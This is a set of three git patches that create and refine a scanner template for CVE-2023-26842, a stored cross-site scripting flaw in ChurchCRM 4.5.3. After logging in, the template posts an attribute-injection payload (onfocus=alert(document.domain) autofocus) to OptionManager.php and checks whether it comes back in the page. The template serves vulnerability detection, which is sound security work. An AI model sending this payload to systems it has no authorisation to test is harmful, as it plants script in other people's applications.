From dad8a4d86ce9cf88a655cc05f05d2f7a7c0c294c Mon Sep 17 00:00:00 2001 From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com> Date: Sun, 25 Jun 2023 01:32:26 +0530 Subject: [PATCH 1/3] Create CVE-2023-26842.yaml --- http/cves/2023/CVE-2023-26842.yaml | 52 ++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/cves/2023/CVE-2023-26842.yaml diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml new file mode 100644 index 0000000000..de53597b39 --- /dev/null +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -0,0 +1,52 @@ +id: CVE-2023-26842 + +info: + name: ChurchCRM - Stored Cross Site Scripting + author: Harsh + severity: medium + description: | + A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php. + reference: + - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-26842 + - https://nvd.nist.gov/vuln/detail/CVE-2023-26842 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2023-26842 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,churchCRM,stored,xss,authenticated +http: + - raw: + - | + POST /churchcrm/session/begin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + User={{username}}&Password={{password}} + + - | + POST /churchcrm//OptionManager.php?mode=classes&ListID=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + 1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=" onfocus=alert(document.domain) autofocus="&AddField=Add+New+Person+Classification + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "onfocus=alert(document.domain) autofocus=")' + - 'contains(body_2, "ChurchCRM")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true From 5ffcba81f7acf94edcfb05b2ba16a8dafd9aa567 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 26 Jun 2023 11:02:18 +0530 Subject: [PATCH 2/3] updated path,info --- http/cves/2023/CVE-2023-26842.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index de53597b39..03b4629b29 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -1,7 +1,7 @@ id: CVE-2023-26842 info: - name: ChurchCRM - Stored Cross Site Scripting + name: ChurchCRM 4.5.3 - Cross-Site Scripting author: Harsh severity: medium description: | @@ -16,18 +16,19 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2023,churchCRM,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored,xss,authenticated + http: - raw: - | - POST /churchcrm/session/begin HTTP/1.1 + POST /session/begin HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded User={{username}}&Password={{password}} - | - POST /churchcrm//OptionManager.php?mode=classes&ListID=1 HTTP/1.1 + POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded @@ -39,6 +40,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' - 'contains(body_2, "onfocus=alert(document.domain) autofocus=")' - 'contains(body_2, "ChurchCRM")' condition: and From c8a71e932fb87d19bf3201301c41a37a42094641 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 26 Jun 2023 11:07:41 +0530 Subject: [PATCH 3/3] lint fix --- http/cves/2023/CVE-2023-26842.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 03b4629b29..635658fdd3 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -1,7 +1,7 @@ id: CVE-2023-26842 info: - name: ChurchCRM 4.5.3 - Cross-Site Scripting + name: ChurchCRM 4.5.3 - Cross-Site Scripting author: Harsh severity: medium description: |